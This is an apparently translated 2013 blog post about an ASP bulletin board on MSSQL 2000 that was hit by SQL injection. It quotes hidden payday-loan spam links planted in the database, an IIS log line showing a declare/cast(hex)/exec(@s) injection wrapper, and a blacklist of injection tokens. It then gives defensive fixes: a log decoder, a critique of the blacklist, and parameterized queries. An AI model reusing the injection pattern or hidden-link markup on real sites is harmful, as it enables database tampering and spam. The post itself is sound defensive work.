Other

mssql 2000 sql injection

by xfree302 2013. 3. 18.

I needed a bulletin board in a hurry,

so I installed MSSQL 2000, grabbed a free ASP board source and set it up..

Now the DB gets attacked periodically.. ㅠㅠ

A specific URL gets planted in the text columns..


</title><style>.a644{position:absolute;clip:rect(480px,auto,auto,480px);}</style><div class=a644>approval <a href=http://adampaydayloans.com >online payday loan</a></div>

</title><style>.a94d{position:absolute;clip:rect(463px,auto,auto,463px);}</style><div class=a94d>instant <a href=http://lidapaydayloans.com >payday loans online</a></div>

</title><style>.aymd{position:absolute;clip:rect(440px,auto,auto,440px);}</style><div class=aymd>same day <a href=http://willpaydayloans.com >payday loans</a></div>

IIS log entry for the request. Everything after the first `|` is the ASP error that IIS appends to the cs-uri-query field: line 80 of a.asp raised 800a000d, VBScript's "Type mismatch" (형식이 일치하지 않습니다), evidently while converting the intLrg value to a number, so this particular request died before reaching the database. The statement that does the damage sits inside the hex literal in cast(...), which is not reproduced here; the visible declare/set/exec(@s) shell only converts that hex to a varchar and runs it, which is why none of the usual keywords (update, insert) show up in the query string.

/a.asp intLrg=21+declare+@s+varchar(8000)+set+@s=cast([...](8000))+exec(@s)--|80|800a000d|형식이_일치하지_않습니다.:_'[string:__21_declare_@s_varcha_]'


Damn.. SQL injection ....
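How to read a query string like the one in the log, as an added example (this is not code from the original post): URL-decode it the way Request.QueryString would, then expand the cast(0x... as varchar(8000)) literal the way SQL Server does, so the hidden T-SQL becomes readable. The hex value used here is a constructed stand-in for the one the post elides, and the script is written for cscript.exe rather than for an ASP page.

```vbscript
Option Explicit
' Added example, not from the original post. Decodes an IIS cs-uri-query value
' and expands cast(0x... as varchar(n)) literals into the text they carry.

' Request.QueryString-style decoding: '+' is a space, %XX is one byte.
Function UrlDecode(s)
    Dim i, out, ch
    s = Replace(s, "+", " ")
    out = ""
    i = 1
    Do While i <= Len(s)
        ch = Mid(s, i, 1)
        ' only treat % as an escape when two valid hex digits follow it
        If ch = "%" And i + 2 <= Len(s) And IsNumeric("&H" & Mid(s, i + 1, 2)) Then
            out = out & Chr(CLng("&H" & Mid(s, i + 1, 2)))
            i = i + 3
        Else
            out = out & ch
            i = i + 1
        End If
    Loop
    UrlDecode = out
End Function

' "75706461..." -> "upda..." : what SQL Server does for CAST(0x.. AS varchar).
Function HexToString(hexStr)
    Dim i, out
    out = ""
    For i = 1 To Len(hexStr) - 1 Step 2
        out = out & Chr(CLng("&H" & Mid(hexStr, i, 2)))
    Next
    HexToString = out
End Function

' Replace every cast(0x.... as varchar(n)) in a decoded query with its plain text,
' so the statement that exec(@s) would run is visible in the log line.
Function ExpandCastHex(query)
    Dim re, m, result
    Set re = New RegExp
    re.Global = True
    re.IgnoreCase = True
    re.Pattern = "cast\(0x([0-9a-f]+)\s+as\s+n?varchar\(\d+\)\)"
    result = query
    For Each m In re.Execute(query)
        result = Replace(result, m.Value, HexToString(m.SubMatches(0)))
    Next
    ExpandCastHex = result
End Function

' Constructed sample in the shape of the logged request (assumption: the real hex
' literal is not on the page). This hex encodes the harmless text: update t set c='x'
Dim logQuery
logQuery = "intLrg=21+declare+@s+varchar(8000)+set+@s=" & _
           "cast(0x75706461746520742073657420633D277827+as+varchar(8000))+exec(@s)--"
WScript.Echo ExpandCastHex(UrlDecode(logQuery))
```

Run it with `cscript //nologo decode.vbs`; the printed line shows the declare/set/exec wrapper with the hex literal replaced by the text it hides, which for the sample above is the update statement encoded in the comment. Point the same two functions at the real cs-uri-query values from the IIS log to see what was actually executed against the board.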

Special-character filtering..

 ' Blacklist filter wrapped as a function. VBScript has no backslash escapes, so the
 ' original "\@variable " / "\@@variable " / "\+" patterns only matched a literal backslash.
 Function FilterSql(str)
     str = Replace(str, "'", "''")    ' double single quotes so a string literal stays closed
     str = Replace(str, ";", "")      ' statement separator
     str = Replace(str, "--", "")     ' line comment
     str = Replace(str, "@", "")      ' T-SQL variables (@s, @@version)
     str = Replace(str, "+", "")      ' string concatenation
     str = Replace(str, "exec ", "")  ' case-sensitive, and misses "exec(" as written in the log
     FilterSql = str
 End Function

and so on..
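A blacklist like the one above is easy to walk around: Replace compares case-sensitively by default, the logged payload writes exec( with no trailing space, and its + signs are URL-encoded spaces that Request.QueryString has already turned into spaces before any filter runs. What closes the hole is to stop building SQL from strings. The following is an added example, not the board's original code: the insert and listing paths rewritten with ADODB parameters, with a numeric check for intLrg that rejects the logged value instead of crashing on it. The table and column names (board, id, title, content) and the connection string are assumptions.

```vbscript
<%
Option Explicit
' Added example, not the board's original code. Assumed schema:
'   CREATE TABLE board (id int IDENTITY PRIMARY KEY, title varchar(200), content text)
' ADO constants (normally pulled in from adovbs.inc)
Const adCmdText = 1, adParamInput = 1
Const adInteger = 3, adVarChar = 200, adLongVarChar = 201

' Numeric input: convert or fall back, never concatenate the raw string.
' The logged value "21 declare @s varchar(8000) ..." fails IsNumeric and is dropped.
Function ToLong(rawValue, fallback)
    If IsNumeric(rawValue) Then
        ToLong = CLng(rawValue)
    Else
        ToLong = fallback
    End If
End Function

' Bound parameters: whatever is in title/content is stored as text, never parsed as
' T-SQL, so a quote, "--" or a declare/exec(@s) chain inside a post stays inert.
Sub InsertPost(conn, title, content)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "INSERT INTO board (title, content) VALUES (?, ?)"
    cmd.Parameters.Append cmd.CreateParameter("title", adVarChar, adParamInput, 200, Left(title, 200))
    cmd.Parameters.Append cmd.CreateParameter("content", adLongVarChar, adParamInput, Len(content) + 1, content)
    cmd.Execute
End Sub

' Listing: the numeric filter is bound as adInteger, and stored text is HTML-encoded
' on the way out, so an injected </title><style>...<a href=...> string is shown as
' literal characters instead of hiding a link on the page.
Sub ListPosts(conn, lastId)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT title, content FROM board WHERE id > ? ORDER BY id"
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , lastId)
    Set rs = cmd.Execute
    Do Until rs.EOF
        Response.Write "<h3>" & Server.HTMLEncode(rs("title") & "") & "</h3>"
        Response.Write "<p>" & Server.HTMLEncode(rs("content") & "") & "</p>"
        rs.MoveNext
    Loop
    rs.Close
End Sub

Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
' connection string is an assumption; keep whatever the board already uses
conn.Open "Provider=SQLOLEDB;Data Source=(local);Initial Catalog=board;Integrated Security=SSPI;"

If Request.ServerVariables("REQUEST_METHOD") = "POST" Then
    InsertPost conn, Request.Form("title"), Request.Form("content")
End If
ListPosts conn, ToLong(Request.QueryString("intLrg"), 0)

conn.Close
%>
```

The two changes that matter are that no request value is ever concatenated into CommandText (numbers go through CLng, strings through CreateParameter) and that output is encoded with Server.HTMLEncode, which also neutralises rows the attacker has already modified until they are cleaned up.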


References

http://blog.naver.com/nyangthing?Redirect=Log&logNo=52393889

http://www.google.co.kr/search?q=mssql+sql+injection

http://blog.cafe24.com/1393

http://saybox.tistory.com/546

http://blog.naver.com/youngjin_com?Redirect=Log&logNo=10034754155

http://totoriver.egloos.com/3158009
